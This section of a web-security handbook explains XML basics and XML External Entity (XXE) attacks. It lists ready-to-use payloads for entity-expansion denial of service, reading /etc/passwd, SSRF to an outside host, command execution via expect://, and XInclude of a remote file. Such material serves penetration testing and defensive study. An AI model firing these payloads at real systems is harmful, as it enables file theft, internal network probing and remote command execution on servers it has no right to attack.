4.10. XXE

4.10.1. XML Basics

XML, which stands for eXtensible Markup Language, is a markup language for marking up electronic documents to make them structured, and is designed to transmit and store data. The XML document structure includes XML declaration, DTD document type definition (optional), and document elements. At present, XML files are widely used as configuration files (Spring, Struts2, etc.), document structure description files (PDF, RSS, etc.), and image format files (SVG header). The syntax specification of XML is controlled by DTD (Document Type Definition).

4.10.2. Basic syntax

An XML document has a <?xml version="1.0" encoding="UTF-8" standalone="yes"?> define, called an XML prolog, for declaring the version and encoding of an XML document. It is optional, but must be placed at the beginning of the document.

In addition to the optional header, the XML syntax mainly has the following features:

  • All XML elements must have closing tags

  • XML tags are case sensitive

  • XML must be properly nested

  • XML documents must have a root element

  • XML attribute values ​​need to be quoted

In addition, XML also has a CDATA syntax for dealing with multiple characters that need to be escaped.

4.10.3. XXE

When external entities are allowed to be referenced, malicious XML content can be constructed, resulting in the reading of arbitrary files, executing system commands, detecting intranet ports, and attacking intranet websites. For general XXE attacks, XXE vulnerabilities can be used to read server-side files only if the server has an echo or an error report, but the attack can also be achieved by means of Blind XXE.

4.10.4. Attack Mode

4.10.4.1. Denial of Service Attacks

<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY a0 "dos" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;">
]>
<data>&a2;</data>

If the parsing process is very slow, the test is successful and the target site may have a denial of service vulnerability. Specific attacks can use more layers of iteration or recursion, and can also reference huge external entities to achieve the effect of the attack.

4.10.4.2. File reading

<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<data>&file;</data>

4.10.4.3. SSRF

<?xml version="1.0"?>
<!DOCTYPE data SYSTEM "http://publicServer.com/" [
<!ELEMENT data (#ANY)>
]>
<data>4</data>

4.10.4.4. RCE

<?xml version="1.0"?>
<!DOCTYPE GVI [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<catalog>
   <core id="test101">
      <description>&xxe;</description>
   </core>
</catalog>

4.10.4.5. XInclude

<?xml version='1.0'?>
<data xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://publicServer.com/file.xml"></xi:include></data>